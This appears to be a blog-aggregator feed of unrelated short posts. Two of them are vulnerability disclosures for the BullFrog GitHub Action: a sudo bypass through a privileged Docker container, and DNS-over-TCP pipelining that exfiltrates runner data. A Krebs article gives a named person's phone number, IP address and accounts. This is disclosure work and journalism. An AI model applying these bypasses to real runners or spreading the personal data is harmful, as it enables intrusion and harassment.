I haven't used it in years. My personal account lay dormant. My work account has a single test query despite my employer trying its hardest to get us to use it. But I think none of that matters when OpenAI caters to a government agency with a near-infinite budget. For every public account that gets closed, OpenAI will make up for it with deeper integration into classified networks. Not even 24 hours later, the US is at war with Iran. So while we're at it, here is a nice little link to help you close your OpenAI account .

ava's blog Yesterday

rose ▪ bud ▪ thorn - february 2026

Published 28 Feb, 2026 5 year anniversary with my wife. :) Started a creation event for the Gazette. I created more art! I made some buttons and banners, and some pixel art for myself and with Xaya. I rebranded my professional website (not this one). Put a lot of effort into the colors, associations, text, font and all, with a proper brand kit development. That's a first. I had a healthier relationship with food recently. I managed to summarize and translate 1-2 court decisions each week for noyb.eu, and I became Silver Member (10+ translated/summarized court cases). 2 more and I will already be Gold Member (20+). I received some helpful replies to e-mail inquiries for opportunities :) I was finally able to publish the first interview for my privacy professionals series! Friends visited and it wasn't just fun, but it also got me cleaning up the apartment so well. My wife has been baking amazing bread recently. The first two to three attempts were disappointing, but we kept at it and now our bread is sooooo good. She also baked me some matcha strawberry sugar cookies. My hair is long enough now to properly take care of it again with conditioner and oils. I can't wait until it grows long enough for a first haircut to kind of get it even and not so layered; I am also thinking of getting bangs? They always annoy me, but I think I can make it work this time...? I always think that... and at the same time, I also wanna grow it out again and bleach some money pieces. And I kinda wanna dye the underside of my hair, near my neck, too? I am conflicted. Still working on sending out e-mails for more interviews. Working on switching away from Discord! Probably Matrix. Already had an account there but it somehow got lost, so I made a new one. Now just working on transitioning some stuff. I've decluttered my closet, now I just need to sell the stuff. 
I'm planning a date day for myself where I get my nails done again (haven't done that in months), a lash lift, a visit to the cinema, and buy some clothing I need. I am in need of replacing some items and also diving deeper into a new personal style I want. Reintroducing caffeine has been a bust. My tolerance seems to have plummeted to zero thanks to my experiment, and even very weak black tea is having some negative effects... and even my matcha! I guess I'll have to reduce it to once a week. I haven't been studying nearly as much as I should. I've been indulging a lot in just resting, reading, and creating, which isn't super bad, but I feel guilty for neglecting my studies when I have 4 upcoming exams for modules totaling 30 ECTS as a part-time student. :( Job applications and apartment hunting paused for now. Right now seems like an absolutely terrible time for both.


LLM Use in the Python Source Code

There is a trick that is spreading through social media. If you block the claude user on GitHub, then each time you visit a GitHub repository that has commits by this user you get a banner at the top alerting you to the user's participation. It's an easy way to spot projects that have started to rely on coding agents, in this case on Claude Code specifically. Imagine the surprise when you see that CPython, one of the most popular open-source projects in the world, is now receiving contributions from claude.
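The banner trick is a side effect of the web UI, but the same check can be scripted. The GitHub commits API supports an author filter (GET /repos/{owner}/{repo}/commits?author=<login>), so a sketch like the following could flag repos with agent commits; the helper names are mine, not from the post:

```python
# Hypothetical sketch: spot agent-authored commits via the GitHub REST API
# instead of the block-user banner trick described above.

def commits_by_author_url(owner: str, repo: str, login: str) -> str:
    """Build the API URL that lists only commits authored by `login`.
    One result is enough to answer yes/no, hence per_page=1."""
    return (
        f"https://api.github.com/repos/{owner}/{repo}/commits"
        f"?author={login}&per_page=1"
    )

def uses_agent(commits_json: list) -> bool:
    """A non-empty commit list means the repo has at least one commit by that user."""
    return len(commits_json) > 0

print(commits_by_author_url("python", "cpython", "claude"))
```

Fetching that URL with any HTTP client and passing the decoded JSON array to `uses_agent` gives the same signal as the banner, minus the blocking.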


There should be a citizen-led path to amend the Constitution

There are many issues with widespread bipartisan agreement that never go anywhere, for example limiting corporate money in campaigns and making gerrymandering illegal. As a surprise to no one, Congress is the bottleneck on these issues and many, many more. If the people on both sides generally agree for years and years, and Congress still doesn’t do anything about it, then that’s a structural governance problem. For stuck issues like these, we should have a citizen-led path to amend the Constitution as a solution to this governance problem. Now I fully agree that it should be super hard to amend the Constitution, and so we could make this path just as hard as the Congress-led one. 1 The current Congress-led path is two-thirds of both houses need to propose an amendment and then three-fourths of state legislatures need to ratify it. 2 A citizen-led path could similarly require two-thirds of states to propose an amendment (via something like signature campaigns within those states) and then a nationwide three-fourths vote to ratify it. 3 In other words the thresholds could be similar, just put directly in the hands of the people. You would still need most red and blue states working together to pass an amendment, such that nothing could pass without super-majority bipartisan support. That is, a super high bar. There are a lot of interesting structural reform proposals out there, but most require new Constitutional amendments to have lasting staying power. 4 To really unlock the possibilities for those, we need a citizen-led amendment path in place first. Of course, we would need an amendment using the old way to get this new way in place. 5 Congress won’t reform itself, but a citizen-led amendment path could. 
1. I’d also argue the current path is too hard, but I’m ignoring that for now since it is independent of this argument.
2. There is technically also a path for state legislatures to call a constitutional convention, but it’s never been used and it still routes through legislatures and representatives rather than citizens directly.
3. Signature campaigns could mimic current processes of how citizen-led ballot initiatives work, but there are other options (including non-signature-based options) as well.
4. A few examples of interesting structural reforms likely requiring an amendment to be long-term effective are increasing the number of representatives, term limits, and ranked-choice voting.
5. This type of citizen-led amendment path has been proposed as a Constitutional amendment in the past and hasn’t gone anywhere either, but at some point we may reach a breaking point where something like this could take hold.
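The fractions in both paths are easy to make concrete. A quick sketch of the actual vote counts implied, using today's seat counts (435 House members, 100 senators, 50 states); the rounding up is my own arithmetic, the fractions are from the post:

```python
from math import ceil

# Current Congress-led path under Article V:
house_propose  = ceil(2 * 435 / 3)  # two-thirds of the House
senate_propose = ceil(2 * 100 / 3)  # two-thirds of the Senate
states_ratify  = ceil(3 * 50 / 4)   # three-fourths of state legislatures

# The proposed citizen-led path, with matching thresholds:
states_propose = ceil(2 * 50 / 3)   # two-thirds of states via signature campaigns

print(house_propose, senate_propose, states_propose, states_ratify)  # → 290 67 34 38
```

In other words, even the citizen-led version still needs 34 states on board to propose and a three-fourths nationwide vote to ratify, which is the "super high bar" the post describes.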

devansh Yesterday

sudo restriction bypass via Docker Group in BullFrog GitHub Action

Least privilege is one of those security principles that everyone agrees with and almost nobody fully implements. In the GitHub Actions context, it means your workflow steps should only have the access they actually need, and no more. Running arbitrary third-party actions or build scripts as a user with unrestricted sudo is a liability: one compromised dependency, one malicious action, and an attacker owns the runner.

BullFrog, the egress-filtering agent for GitHub Actions I wrote about previously, ships a feature specifically to address this. Enable it and BullFrog removes sudo access for all subsequent steps in the job, or so it claims. The option, when enabled, strips sudo privileges from the runner user for all steps that follow the BullFrog setup step. It's designed as a privilege reduction primitive: you harden the environment early in the job so that nothing downstream can accidentally (or intentionally) run as root. After the setup step, sudo should fail, and subsequent steps should be constrained to what the unprivileged user can do.

BullFrog achieves this by modifying the sudoers configuration, essentially removing or neutering the runner user's sudo entry. This works at the sudoers level: the binary is still there, but the policy that would grant elevation is gone.

On GitHub-hosted Ubuntu runners, the runner user is already a member of the docker group. This means the runner user can spawn Docker containers without sudo; no privilege escalation is required to get Docker running. And Docker, when given privileged mode and a host filesystem mount, is essentially root with extra steps. A privileged container with the host root mounted can write anywhere on the host filesystem, including the sudoers configuration. The sudo restriction is applied at one layer; Docker punches straight through to the layer below it.

The feature only removes the sudoers entry for the runner user. It does not restrict Docker access, does not drop the runner from the docker group, and does not prevent privileged container execution. Because Docker daemon access is equivalent to root access on the host, the sudo restriction can be fully reversed in a single command: no password, no escalation, no interaction required. The bypass drops a sudoers rule back into place by writing through the container's view of the host filesystem. After this, sudo succeeds again and the runner has full root access for the rest of the job.

The workflow I built demonstrates the full bypass: disable sudo with BullFrog, confirm it's gone, restore it via Docker, confirm it's back. The workflow output confirms the sequence cleanly: BullFrog disables sudo, the verification step passes, Docker writes the sudoers rule, and the final step confirms full sudo access is back, all within the same job, all as the unprivileged user, with no external dependencies beyond the Docker image.

Reported to the BullFrog team on November 28th, 2025. No response, acknowledgment, or fix was issued in the roughly three months that followed, so I'm disclosing publicly now. This is one of two BullFrog vulnerabilities I'm disclosing simultaneously due to the same lack of response; see also Bypassing egress filtering in BullFrog GitHub Action.

Affected versions: v0.8.4 and likely all prior versions. Fixed versions: none as of disclosure date (I did not bother to check).

Disclosure timeline:
Discovery & report: 28th November 2025
Vendor contact: 28th November 2025
Vendor response: none
Public disclosure: 28th February 2026
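The single-command restore the post describes amounts to one privileged docker run that writes through the host mount. A hedged sketch of what such a command could look like; the image name, mount point, sudoers drop-in path, and the rule itself are my own illustrative assumptions, not taken from the report:

```python
# Sketch of the bypass pattern: a privileged container mounts the host root
# and writes a sudoers rule back into place through it. All concrete names
# here (image, mount point, drop-in file) are illustrative assumptions.
sudoers_rule = "runner ALL=(ALL) NOPASSWD:ALL"

restore_cmd = [
    "docker", "run", "--rm",
    "--privileged",      # privileged container: effectively root on the host
    "-v", "/:/host",     # host filesystem becomes visible at /host
    "ubuntu:24.04", "sh", "-c",
    f"echo '{sudoers_rule}' > /host/etc/sudoers.d/restore"
    " && chmod 0440 /host/etc/sudoers.d/restore",
]

print(" ".join(restore_cmd))
```

Nothing in this command needs sudo: docker group membership alone is enough to launch it, which is exactly the layering gap the post points at.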

Heather Burns Yesterday

I, Sisyphus

I spoke with New Scientist about a handful of clauses in the Children’s Wellbeing and Schools Bill, which is currently reaching the finish line of the Parliamentary process.


Who is the Kimwolf Botmaster “Dort”?

In early January 2026, KrebsOnSecurity revealed how a security researcher disclosed a vulnerability that was used to build Kimwolf , the world’s largest and most disruptive botnet. Since then, the person in control of Kimwolf — who goes by the handle “ Dort ” — has coordinated a barrage of distributed denial-of-service (DDoS), doxing and email flooding attacks against the researcher and this author, and more recently caused a SWAT team to be sent to the researcher’s home. This post examines what is knowable about Dort based on public information. A public “dox” created in 2020 asserted Dort was a teenager from Canada (DOB August 2003) who used the aliases “ CPacket ” and “ M1ce .” A search on the username CPacket at the open source intelligence platform OSINT Industries finds a GitHub account under the names Dort and CPacket that was created in 2017 using the email address [email protected] . Image: osint.industries. The cyber intelligence firm Intel 471 says [email protected] was used between 2015 and 2019 to create accounts at multiple cybercrime forums, including Nulled (username “Uubuntuu”) and Cracked (user “Dorted”); Intel 471 reports that both of these accounts were created from the same Internet address at Rogers Canada (99.241.112.24). Dort was an extremely active player in the Microsoft game Minecraft who gained notoriety for their “ Dortware ” software that helped players cheat. But somewhere along the way, Dort graduated from hacking Minecraft games to enabling far more serious crimes. Dort also used the nickname DortDev , an identity that was active in March 2022 on the chat server for the prolific cybercrime group known as LAPSUS$ . Dort peddled a service for registering temporary email addresses, as well as “ Dortsolver ,” code that could bypass various CAPTCHA services designed to prevent automated account abuse. Both of these offerings were advertised in 2022 on SIM Land , a Telegram channel dedicated to SIM-swapping and account takeover activity. 
The cyber intelligence firm Flashpoint indexed 2022 posts on SIM Land by Dort that show this person developed the disposable email and CAPTCHA bypass services with the help of another hacker who went by the handle “ Qoft .” “I legit just work with Jacob,” Qoft said in 2022 in reply to another user, referring to their exclusive business partner Dort. In the same conversation, Qoft bragged that the two had stolen more than $250,000 worth of Microsoft Xbox Game Pass accounts by developing a program that mass-created Game Pass identities using stolen payment card data. Who is the Jacob that Qoft referred to as their business partner? The breach tracking service Constella Intelligence finds the password used by [email protected] was reused by just one other email address: [email protected] . Recall that the 2020 dox of Dort said their date of birth was August 2003 (8/03). Searching this email address at DomainTools.com reveals it was used in 2015 to register several Minecraft-themed domains, all assigned to a Jacob Butler in Ottawa, Canada and to the Ottawa phone number 613-909-9727. Constella Intelligence finds [email protected] was used to register an account on the hacker forum Nulled in 2016, as well as the account name “M1CE” on Minecraft. Pivoting off the password used by their Nulled account shows it was shared by the email addresses [email protected] and [email protected] , the latter being an address at a domain for the Ottawa-Carelton District School Board . Data indexed by the breach tracking service Spycloud suggests that at one point Jacob Butler shared a computer with his mother and a sibling, which might explain why their email accounts were connected to the password “jacobsplugs.” Neither Jacob nor any of the other Butler household members responded to requests for comment. 
The open source intelligence service Epieos finds [email protected] created the GitHub account “ MemeClient .” Meanwhile, Flashpoint indexed a deleted anonymous Pastebin.com post from 2017 declaring that MemeClient was the creation of a user named CPacket — one of Dort’s early monikers. Why is Dort so mad? On January 2, KrebsOnSecurity published The Kimwolf Botnet is Stalking Your Local Network , which explored research into the botnet by Benjamin Brundage , founder of the proxy tracking service Synthient . Brundage figured out that the Kimwolf botmasters were exploiting a little-known weakness in residential proxy services to infect poorly-defended devices — like TV boxes and digital photo frames — plugged into the internal, private networks of proxy endpoints. By the time that story went live, most of the vulnerable proxy providers had been notified by Brundage and had fixed the weaknesses in their systems. That vulnerability remediation process massively slowed Kimwolf’s ability to spread, and within hours of the story’s publication Dort created a Discord server in my name that began publishing personal information about and violent threats against Brundage, Yours Truly, and others. Dort and friends incriminating themselves by planning swatting attacks in a public Discord server. Last week, Dort and friends used that same Discord server (then named “Krebs’s Koinbase Kallers”) to threaten a swatting attack against Brundage, again posting his home address and personal information. Brundage told KrebsOnSecurity that local police officers subsequently visited his home in response to a swatting hoax which occurred around the same time that another member of the server posted a door emoji and taunted Brundage further. Dort, using the alias “Meow,” taunts Synthient founder Ben Brundage with a picture of a door. 
Someone on the server then linked to a cringeworthy (and NSFW) new Soundcloud diss track recorded by the user DortDev that included a stickied message from Dort saying, “Ur dead nigga. u better watch ur fucking back. sleep with one eye open. bitch.” “It’s a pretty hefty penny for a new front door,” the diss track intoned. “If his head doesn’t get blown off by SWAT officers. What’s it like not having a front door?” With any luck, Dort will soon be able to tell us all exactly what it’s like. Update, 10:29 a.m.: Jacob Butler responded to requests for comment, speaking with KrebsOnSecurity briefly via telephone. Butler said he didn’t notice earlier requests for comment because he hasn’t really been online since 2021, after his home was swatted multiple times. He acknowledged making and distributing a Minecraft cheat long ago, but said he hasn’t played the game in years and was not involved in Dortsolver or any other activity attributed to the Dort nickname after 2021. “It was a really old cheat and I don’t remember the name of it,” Butler said of his Minecraft modification. “I’m very stressed, man. I don’t know if people are going to swat me again or what. After that, I pretty much walked away from everything, logged off and said fuck that. I don’t go online anymore. I don’t know why people would still be going after me, to be completely honest.” When asked what he does for a living, Butler said he mostly stays home and helps his mom around the house because he struggles with autism and social interaction. He maintains that someone must have compromised one or more of his old accounts and is impersonating him online as Dort. “Someone is actually probably impersonating me, and now I’m really worried,” Butler said. “This is making me relive everything.” But there are issues with Butler’s timeline. For example, Jacob’s voice in our phone conversation was remarkably similar to the Jacob/Dort whose voice can be heard in this Sept. 
2022 Clash of Code competition between Dort and another coder (Dort lost). At around 6 minutes and 10 seconds into the recording, Dort launches into a cursing tirade that mirrors the stream of profanity in the diss rap that Dortdev posted threatening Brundage. Dort can be heard again at around 16 minutes; at around 26:00, Dort threatens to swat his opponent. Butler said the voice of Dort is not his, exactly, but rather that of an impersonator who had likely cloned his voice. “I would like to clarify that was absolutely not me,” Butler said. “There must be someone using a voice changer. Or something of the sorts. Because people were cloning my voice before and sending audio clips of ‘me’ saying outrageous stuff.”

devansh Yesterday

Bypassing egress filtering in BullFrog GitHub Action

GitHub Actions runners are essentially ephemeral Linux VMs that execute your CI/CD pipelines. The fact that they can reach the internet by default has always been a quiet concern for security-conscious teams: one malicious or compromised step can silently exfiltrate secrets, environment variables, or runner metadata out to an attacker-controlled server. A handful of tools have been built to address exactly this problem. One of them is BullFrog, a lightweight egress-filtering agent for GitHub Actions that promises to block outbound network traffic to domains outside your allowlist. The idea is elegant: drop everything except what you explicitly trust. So naturally, I poked at it.

BullFrog is an open-source GitHub Actions security tool that intercepts and filters outbound network traffic from your CI runners. You drop it into your workflow as a step, hand it a domain allowlist and an egress policy, and it uses a userspace agent to enforce that policy on every outbound packet. After the setup step, any connection to a domain not on the allowlist should be blocked. The idea is solid. Supply chain attacks, secret exfiltration, dependency confusion: all of these require outbound connectivity. Cutting that off at the network layer is a genuinely good defensive primitive.

The BullFrog agent intercepts outbound packets using netfilter queue (NFQUEUE). When a DNS query packet is intercepted, the agent inspects the queried domain against the allowlist. If the domain matches, the packet goes through. If it doesn't, it's dropped. For DNS over UDP, this is fairly straightforward: one UDP datagram, one DNS message. But DNS also runs over TCP, and TCP is where things get interesting. DNS-over-TCP is used when a DNS response exceeds 512 bytes (common with DNSSEC, large records, etc.), or when a client explicitly prefers TCP for reliability. RFC 1035 specifies that DNS messages over TCP are prefixed with a 2-byte length field to delimit individual messages. 
Crucially, the same TCP connection can carry multiple DNS messages back-to-back; this is called DNS pipelining (RFC 7766). This is the exact footgun BullFrog stepped on.

BullFrog's DNS-over-TCP handler parses the incoming TCP payload, extracts the first DNS message using the 2-byte length prefix, checks it against the allowlist, and returns. It never looks at the rest of the TCP payload. If there are additional DNS messages pipelined in the same TCP segment, they are completely ignored. The consequence: if the first message queries an allowed domain, the entire packet is accepted, including any subsequent messages querying blocked domains. Those blocked queries sail right through to the upstream DNS server.

The smoking gun is at agent/agent.go#L403: the function slices out only the first length-prefixed message, decodes that single DNS message, runs the policy check on it, and returns its verdict. Any bytes after it, which may contain one or more additional DNS messages, are never touched. It's a classic "check the first item, trust the rest" mistake. The guard is real, but it only covers the front door.

The first query acts as camouflage. The second is the actual payload: it can encode arbitrary data in the subdomain (hostname, runner name, env vars, secrets) and have it resolved by a DNS server the attacker controls. The attacker observes the DNS lookup on their end and retrieves the exfiltrated data. No HTTP, no direct socket to a C2, no obvious telltale traffic pattern.

The proof-of-concept builds two raw DNS queries, wraps each with a 2-byte TCP length prefix per RFC 1035, concatenates them into a single payload, and sends it over one TCP connection to the upstream resolver. Runner metadata (OS, kernel release, hostname, runner name) is embedded in the exfiltration domain. 
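The pipelined payload is simple to construct with Python's struct module. A sketch under my own assumptions (the allowed and attacker-controlled domain names here are illustrative, and the exfil label is a placeholder):

```python
import struct

def dns_query(domain: str, qid: int) -> bytes:
    """Minimal DNS A-record query in wire format: 12-byte header + one question."""
    header = struct.pack("!HHHHHH", qid, 0x0100, 1, 0, 0, 0)  # RD=1, QDCOUNT=1
    qname = b"".join(
        bytes([len(label)]) + label.encode() for label in domain.split(".")
    ) + b"\x00"
    return header + qname + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN

def tcp_frame(msg: bytes) -> bytes:
    """RFC 1035 framing: DNS over TCP prefixes each message with a 2-byte length."""
    return struct.pack("!H", len(msg)) + msg

# Query 1: an allowed domain, acting as camouflage for the policy check.
# Query 2: a hypothetical attacker-controlled domain carrying exfil data in a label.
payload = tcp_frame(dns_query("google.com", 1)) + tcp_frame(
    dns_query("runner-data.attacker.example", 2)
)

# A correct filter must loop over every length-prefixed message, not stop at one:
def split_messages(buf: bytes) -> list:
    msgs, off = [], 0
    while off + 2 <= len(buf):
        (n,) = struct.unpack("!H", buf[off:off + 2])
        msgs.append(buf[off + 2:off + 2 + n])
        off += 2 + n
    return msgs

print(len(split_messages(payload)))  # → 2

# In the PoC, this payload goes out over one TCP connection to the resolver:
# sock.sendall(payload)
```

A parser that follows the flawed pattern sees only the first (allowed) message; the `split_messages` loop is what it would take to see the second one as well.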
Running this against a real workflow with BullFrog configured to allow only a single benign domain, the runner's OS, kernel version, hostname, and an environment variable were successfully observed in Burp Collaborator's DNS logs, proving that the second DNS query bypassed the policy entirely.

I reported this to the BullFrog team on November 28th, 2025 via their GitHub repository. After roughly three months with no response, acknowledgment, or patch, I'm disclosing this publicly. The vulnerability is straightforward to exploit and affects any workflow using BullFrog where DNS resolution goes over TCP, which Google's public DNS supports natively.

Affected versions: v0.8.4 and likely all prior versions. Fixed versions: none as of disclosure date (did not bother to check).

Disclosure timeline:
Discovery & report: 28th November 2025
Vendor contact: 28th November 2025
Vendor response: none
Public disclosure: 28th February 2026


Daemon: a 2006 techno-thriller that reads like a 2026 product roadmap

Fair warning: this post contains spoilers for both Daemon and Freedom™. Then again, the books came out twenty years ago. If you haven’t read them by now, you probably weren’t going to. I highly recommend them both though, if you haven’t read them yet. I finished re-reading Daniel Suarez’s Daemon and its sequel Freedom™ a few weeks ago. I first picked them up years back and thought they were solid techno-thrillers with some wild ideas baked into an entertaining plot. Reading them again in 2026, they’re just as gripping, but for somewhat different reasons. The realism has caught up in a way I wasn’t expecting. When I first read these books, I took them as clever speculation of what the future may look like. Now I’m reading them and thinking: yeah, that exists. That too. And that. The fiction hasn’t aged, the real world has just gone ahead and built most of it. The premise is straightforward: Matthew Sobol, a dying game developer, leaves behind a distributed AI program that activates after his death. The Daemon, as it’s called, begins infiltrating systems, recruiting operatives through an online game-like interface, and systematically restructuring society. In Freedom™ , the sequel, that restructuring plays out in full: decentralised communities, alternative economies, mesh networks, and a population split between those plugged into the new system and those clinging to the old one. Suarez self-published Daemon in 2006. That bears repeating. 2006. YouTube was a year old. The iPhone didn’t exist yet. And this guy was writing about autonomous vehicles, augmented reality glasses, voice-controlled AI agents, distributed botnets acting with real-world consequences, and desktop fabrication units. Not as far-future sci-fi set in 2150, but as things that were five to ten years away. The Daemon’s entire existence starts with what is essentially a cron job. Sobol’s program sits dormant, scraping news headlines, waiting for a specific trigger: reports of his own death. 
When it finds them, it wakes up and starts executing. It wasn’t a sentient AI gone rogue with a dramatic moment where it comes into being. Just a script polling RSS feeds on a schedule, pattern-matching against text, and firing off the next step in a chain.

I had something similar with OpenClaw for a while. Not the assassinations, obviously, but the same fundamental architecture of scheduled tasks that wake up, pull information from the internet, process it, and take action without any human prompting. Morning briefings, inbox sweeps, periodic research jobs. The Daemon’s trigger mechanism felt sinister in 2006. Now it’s a feature you can configure in a YAML file. Yep, I know what you’re thinking - we’ve had cron for a long time and this part was possible even before the book was written - but this is just the first chapter of the book.

Then there are the autonomous machines. Sobol’s Daemon deploys “AutoM8s”: driverless vehicles that transport operatives and, in the book’s darker moments, act as weapons. It also uses robotic ground units for surveillance and enforcement. In 2006, this was pure fiction. Now Boston Dynamics has Spot, a quadruped robot dog that autonomously navigates terrain, avoids obstacles, and self-charges. Their Atlas humanoid can do backflips, parkour courses, and 540-degree inverted flips. These are real machines you can watch on YouTube doing things that would have read as absurd twenty years ago. Suarez’s vision of autonomous robots patrolling and operating independently isn’t a prediction anymore, it’s a product catalogue.

The always-connected vehicle is another one. In Daemon, the AutoM8s are permanently networked, receiving instructions and sharing data in real time. Every Tesla on the road today is essentially this. Always online, streaming telemetry back to the mothership, receiving over-the-air updates, and feeding its camera data into a collective neural network. The car you’re driving is a node in someone else’s distributed system. 
Sobol would have appreciated the irony of people voluntarily buying into that. One of the creepier technologies in the books is WiFi-based surveillance, using wireless signals to detect and track people through walls. Suarez wrote about this as a covert capability the Daemon could exploit. Carnegie Mellon researchers have since built exactly that. Their “DensePose from WiFi” system uses standard WiFi router signals to reconstruct human poses in real time, even through solid walls. The reflected signals carry enough information about body shape and movement that a neural network can map what you’re doing in a room without a single camera. It works through drywall, wood, and even concrete up to a point, and none of this is classified military tech. It’s published academic research that anyone can read. The acoustic weapon is probably the one that catches people off guard the most. In Daemon, there’s a directed sound system that can make audio appear to come from right beside you while no one else in the room hears a thing. It sounds like science fiction until you look up parametric speakers. Companies like Holosonics have been selling “Audio Spotlight” systems for years. They work by emitting “modulated ultrasonic beams that demodulate into audible sound only within a tight, targeted area” - I’ve experienced these in airports, but have no idea what that quote actually means. Museums, airports, and retailers already use them, and the military has explored them for crowd control. The effect is exactly what Suarez described, sound that seems to materialise out of thin air, audible only to the person standing in the beam, and you can buy one commercially right now. The social dynamics might be the most on-the-nose parallel of all. In the books, the Daemon recruits human operatives to carry out tasks in the physical world. It finds people, assigns them work, and pays them through its own system. The humans don’t fully understand the bigger picture. 
They just complete their tasks and collect their reward. In January 2026, a site called RentAHuman.ai launched. It’s a platform where OpenClaw AI agents can hire actual people to perform tasks for them. Humans sign up with their skills and hourly rate, AI agents post jobs, and people complete them for payment in stablecoins. Over 40,000 people registered within days. The framing is different, obviously. It’s gig work, not a shadowy network of mindless humans - arguably. But the underlying structure is identical. AI systems delegating physical-world tasks to human operatives who sign up voluntarily, motivated by compensation and a sense of participation in something larger. Suarez wrote it as dystopian fiction that, in 2006, seemed like something only the insane would sign up for. We built it as a startup and it got very popular, very quickly.

The 10% that hasn’t happened is mostly about scale and centralisation. Sobol’s Daemon is a single, coherent system with an architect’s intent behind every action. Real distributed systems don’t work like that. AI development has been messy, competitive, and fragmented across hundreds, perhaps even thousands, of companies and research labs. There’s no singular Daemon pulling strings, just a chaotic landscape of overlapping systems with no one fully in control. Which, depending on your perspective, might actually be worse.

The weaponised autonomous vehicles haven’t materialised in the way Suarez imagined either, though military drones certainly have. The line between his fiction and real-world drone warfare is thinner than most people would be comfortable with. And the neat resolution in Freedom™, where Darknet communities build something genuinely better, still feels like the most fictional part of the whole thing. We’ve got the decentralised technology. We’ve got the mesh networks and the alternative currencies. What we haven’t got is the social cohesion to do anything coherent with them. 
Crypto became a speculative casino with massive peaks and equal troughs. The tools exist, but the utopian bit remains out of reach. Suarez wasn’t writing from some academic ivory tower or speculating about technology he’d never touched. He was an IT consultant who spent years working with Fortune 1000 companies, and you can feel that experience on every page. He understood how systems actually work, how they fail, and how they get exploited, which is what makes re-reading both books such a strange experience. He wasn’t guessing at any of this. He was extrapolating from things he could already see forming, and doing it with an accuracy that I genuinely wouldn’t have believed twenty years ago. If you haven’t read Daemon and Freedom™ , go and read them. I track everything I read on Hardcover , and both of these are easy five-star picks. They’re fantastic books on their own merits. The pacing is relentless, the technical detail is sharp without being dry, and the plot keeps pulling you forward. I’d recommend them even if none of the technology had come true. But it has, and not gradually over twenty years. The pace is accelerating. Half the parallels I’ve listed in this post didn’t exist even twelve months ago. OpenClaw’s cron system, RentAHuman.ai, the latest generation of Boston Dynamics robots: all 2025 or 2026 developments. The gap between Suarez’s fiction and our reality is closing faster each year, and that makes the books hit differently every time you revisit them. I suspect they’ll hit differently again in another twelve months, and I can’t wait to re-read them then.

Ratfactor Yesterday

Dave's book review for The Art of Doing Science and Engineering

My rather long book review and/or collection of notes from reading Richard W. Hamming's opus.


RE Backseat Software

Reading through Mike Swanson's article "Backseat Software" made me realize why I tend to gravitate to older platforms and software. Software used to be sold with the expectation that it would accomplish the goal you purchased it for. Now, software is all about keeping you engaged, on platform, etc., so that you keep renewing your subscription (or even better, part with more money and data). Mike writes "Great tools get out of the way so the user can accomplish their goal". I've been in enough companies where the goal is the opposite. You can't let the user just hop on, finish their task and hop off, think of the metrics! If a user's task is accomplished, they won't realize the value and might not renew!

Mike also writes "I don’t want to go back to floppy disks. I like fast updates. I like security patches. I like sync. I like crash reports when they help fix real issues", and to be honest, I disagree with this to a point. I'd love to go back to boxed software on a disc. When a company had to manufacture and distribute discs, it typically made sure the software was well tested to avoid the cost of reprinting them. These days, it's a "ship first, fix later" mentality. Speed is all that matters to a modern software company. This mindset is even growing with the VCDLC (Vibe Code Development Life Cycle).

Just this morning I found my childhood copy of KidPix Deluxe on CD. I know that, if I had a computer from the era, inserting that disc would result in a full, functional experience. No failed license checks due to offline servers, no gigs of updates and no online account. Instead, KidPix would load and be fun just like it was when I played it. I don't need new features. Software should be sold as is. While new features might come later, what you purchased still accomplishes the goal you bought it for.

When I run software on my Palm Pilot, it does exactly what it should. No tracking, no announcements, no updates. If a Palm Pilot app is buggy or lacking, you use an app from a different vendor. Quality was necessary to make sales.

When you buy a hammer, you expect to be able to hit nails. You don't need a manual, just a good nail to hit. Years later the manufacturer might introduce a new carbon fiber hammer with a larger head that hits nails with 30% more accuracy. Your old hammer won't get these features, but it continues to hit nails just fine. And sure, maybe the new hammer fixed a design flaw where the grip occasionally shifts. But again, you've learned to live with it, and it still hits nails. The hammer doesn't define your life or act as a status symbol. It's not engaging or addictive. It's a tool, and it hits nails. Software should be like a hammer.

Justin Duke Yesterday

Unshipping Keystatic

Two years after initially adopting it, we've formally unshipped Keystatic. Our CMS, such as it is, is now a bunch of Markdoc files and a TypeScript schema organizing the front matter — which is to say, it's not really a CMS at all. There were a handful of reasons for this move, in no specific order:

- Our team's use of Keystatic as an actual front-end CMS had dropped to zero. All of the non-coders have grown sufficiently adept with Markdown that the GUI was gathering dust; Keystatic had become a pure schema validation and rendering tool, and offered fairly little beyond what we were already getting from our build step.
- Some of the theoretically nice things — image hosting, better previewing — either didn't work as smoothly as we'd like or were supplanted entirely by Vercel's built-in features.
- The project appears to have atrophied a little bit, commits dwindling into the one-per-quarter frequency despite a healthy number of open issues. This is not to besmirch the lovely maintainers, who have many other things going on. But it's harder to stick around on a library you're not getting much value from when you're also worried there's not a lot of momentum down the road.

That last point is basically what I wrote about Invoke — it's a terrible heuristic, judging a project by its commit frequency, and I know that. Things can and should be finished! And yet. When you're already on the fence, a quiet GitHub graph is the thing that tips you over.

To Keystatic's credit, it was tremendously easy to extricate. The whole migration was maybe two hours of work, most of which was just deleting code. That's the sign of a well-designed library — one that doesn't metastasize into every corner of your codebase. I wish more tools were this easy to leave.
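For a sense of what "a TypeScript schema organizing the front matter" can amount to, here is a minimal sketch. The post doesn't show the real schema, so the field names and the `assertFrontMatter` helper below are purely illustrative: a plain interface plus a build-time check that fails loudly on malformed front matter, with no library required.

```typescript
// Hypothetical front-matter shape; the actual fields in the post's
// codebase are not shown, so these are illustrative stand-ins.
interface PostFrontMatter {
  title: string;
  publishedAt: string; // ISO 8601 date string
  draft?: boolean;
}

// Validate parsed front matter at build time, throwing a descriptive
// error that names the offending file so the build fails loudly.
function assertFrontMatter(
  data: Record<string, unknown>,
  file: string,
): PostFrontMatter {
  if (typeof data.title !== "string" || data.title.length === 0) {
    throw new Error(`${file}: front matter needs a non-empty "title"`);
  }
  if (
    typeof data.publishedAt !== "string" ||
    Number.isNaN(Date.parse(data.publishedAt))
  ) {
    throw new Error(`${file}: "publishedAt" must be an ISO date string`);
  }
  if (data.draft !== undefined && typeof data.draft !== "boolean") {
    throw new Error(`${file}: "draft" must be a boolean`);
  }
  return {
    title: data.title,
    publishedAt: data.publishedAt,
    draft: data.draft as boolean | undefined,
  };
}
```

The appeal of something this small is exactly what the post describes: it lives entirely in the build step, validates every file on deploy, and deleting it later would be a one-file change.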

Pete Warden 2 days ago

Launching a free, open-source, on-device transcription app

